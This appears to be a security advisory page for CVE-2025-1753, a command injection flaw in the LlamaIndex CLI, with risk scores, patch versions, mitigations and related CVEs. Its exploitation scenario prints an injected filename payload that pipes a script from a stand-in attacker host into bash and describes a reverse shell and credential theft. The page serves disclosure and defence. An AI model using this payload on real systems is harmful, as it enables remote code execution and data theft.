CVE-2025-1753: llama-index-cli: OS command injection enables RCE
GHSA-g99h-56mw-8263 HIGH PoC AVAILABLE CISA: ATTENDLlamaIndex CLI (prior to v0.4.1) contains an OS command injection flaw where the --files argument is passed unsanitized directly to os.system(), allowing an attacker to execute arbitrary shell commands on the host with the privileges of the running process. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 84th percentile for exploitation likelihood, the blast radius across the LlamaIndex ecosystem is significant — and the trivial exploitation path (low complexity, no user interaction, no special privileges beyond local access) means weaponization requires virtually no skill. Critically, the attack surface extends well beyond local use: any web application that invokes the LlamaIndex CLI with user-supplied filenames is exposed to remote code execution with full confidentiality, integrity, and availability impact. Patch immediately to llama-index-cli ≥ 0.4.1 (corresponding to llama-index ≥ 0.12.21), and audit all code paths that pass external input to the CLI — reject any filename arguments containing shell metacharacters as an interim control.
What is the risk?
High risk. CVSS 7.8 with complete C/I/A impact (C:H/I:H/A:H). The nominal local attack vector (AV:L) understates real-world exposure: any web application wrapping the CLI for document processing tasks creates a direct remote exploitation path. Low attack complexity and no user interaction required make this a low-barrier exploit. EPSS at the 84th percentile signals elevated real-world exploitation probability relative to the CVE population. The combination of 227 downstream dependents, 12 prior CVEs in the package, and a package risk score of 58/100 indicates systemic security debt in this component. Not yet in CISA KEV and no public exploit confirmed, but the exploitation path is trivially constructable from the public description.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| LlamaIndex | pip | — | No patch |
| LlamaIndex | pip | < 0.4.1 | 0.4.1 |
How severe is it?
What is the attack surface?
What should I do?
5 steps-
Patch immediately: upgrade llama-index-cli to ≥ 0.4.1 and llama-index to ≥ 0.12.21.
-
Audit all code that invokes the LlamaIndex CLI and identify every path where --files values derive from user-controlled input.
-
If patching is not immediately possible, sanitize filename arguments before passing to the CLI — implement an allowlist of safe filename characters and reject any input containing shell metacharacters (;, |, &, $, backtick, parentheses, angle brackets).
-
Run the CLI in a sandboxed environment (container with dropped capabilities, read-only filesystem where possible, seccomp profile blocking exec syscalls) to limit blast radius.
-
For detection: monitor for anomalous child processes spawned from LlamaIndex processes, unexpected outbound network connections from document processing workers, or shell interpreter invocations in AI pipeline environments.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-1753?
LlamaIndex CLI (prior to v0.4.1) contains an OS command injection flaw where the --files argument is passed unsanitized directly to os.system(), allowing an attacker to execute arbitrary shell commands on the host with the privileges of the running process. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 84th percentile for exploitation likelihood, the blast radius across the LlamaIndex ecosystem is significant — and the trivial exploitation path (low complexity, no user interaction, no special privileges beyond local access) means weaponization requires virtually no skill. Critically, the attack surface extends well beyond local use: any web application that invokes the LlamaIndex CLI with user-supplied filenames is exposed to remote code execution with full confidentiality, integrity, and availability impact. Patch immediately to llama-index-cli ≥ 0.4.1 (corresponding to llama-index ≥ 0.12.21), and audit all code paths that pass external input to the CLI — reject any filename arguments containing shell metacharacters as an interim control.
Is CVE-2025-1753 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-1753, increasing the risk of exploitation.
How to fix CVE-2025-1753?
1. Patch immediately: upgrade llama-index-cli to ≥ 0.4.1 and llama-index to ≥ 0.12.21. 2. Audit all code that invokes the LlamaIndex CLI and identify every path where --files values derive from user-controlled input. 3. If patching is not immediately possible, sanitize filename arguments before passing to the CLI — implement an allowlist of safe filename characters and reject any input containing shell metacharacters (;, |, &, $, backtick, parentheses, angle brackets). 4. Run the CLI in a sandboxed environment (container with dropped capabilities, read-only filesystem where possible, seccomp profile blocking exec syscalls) to limit blast radius. 5. For detection: monitor for anomalous child processes spawned from LlamaIndex processes, unexpected outbound network connections from document processing workers, or shell interpreter invocations in AI pipeline environments.
What systems are affected by CVE-2025-1753?
This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, document ingestion pipelines, agent frameworks, LLM application backends.
What is the CVSS score for CVE-2025-1753?
CVE-2025-1753 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 1.03%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0010.005 AI Agent Tool AML.T0049 Exploit Public-Facing Application AML.T0050 Command and Scripting Interpreter Compliance Controls Affected
What are the technical details?
Original Advisory
LLama-Index CLI prior to v0.4.1, corresponding to LLama-Index prior to v0.12.21, contains an OS command injection vulnerability. The vulnerability arises from the improper handling of the `--files` argument, which is directly passed into `os.system`. An attacker who controls the content of this argument can inject and execute arbitrary shell commands. This vulnerability can be exploited locally if the attacker has control over the CLI arguments, and remotely if a web application calls the LLama-Index CLI with a user-controlled filename. This issue can lead to arbitrary code execution on the affected system.
Exploitation Scenario
An attacker targeting an organization with a LlamaIndex-powered document ingestion API submits a crafted HTTP request where the filename field contains an injected shell command — for example, report.pdf; curl http://attacker.com/payload.sh | bash. The backend application, treating the filename as benign input, passes it to the LlamaIndex CLI via the --files argument. The CLI calls os.system() with the full unsanitized string, executing the attacker's payload with the privileges of the application process. The attacker establishes a reverse shell, exfiltrates the RAG database contents and any API keys or credentials in the environment, then pivots to connected AI infrastructure such as the vector database or model serving endpoints.
Weaknesses (CWE)
CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References
- github.com/advisories/GHSA-g99h-56mw-8263
- github.com/run-llama/llama_index/commit/b57e76738c53ca82d88658b82f2d82d1c7839c7d
- huntr.com/bounties/19e1c67e-1d77-451d-b10b-acbe99900b22
- nvd.nist.gov/vuln/detail/CVE-2025-1753
- github.com/ARPSyndicate/cve-scores Exploit
- github.com/fkie-cad/nvd-json-data-feeds Exploit
- github.com/tanjiti/sec_profile Exploit
Timeline
Related Vulnerabilities
CVE-2024-12909 10.0 llama-index finchat: SQL injection enables RCE
Same package: llama-index CVE-2025-1793 9.8 llama_index: SQL injection in vector store integrations
Same package: llama-index CVE-2024-11958 9.8 llama-index DuckDB retriever: SQLi enables RCE
Same package: llama-index CVE-2025-3225 7.5 llama-index Papers Loader: XML expansion DoS
Same package: llama-index CVE-2025-3046 7.5 LlamaIndex Obsidian: symlink traversal exposes host files
Same package: llama-index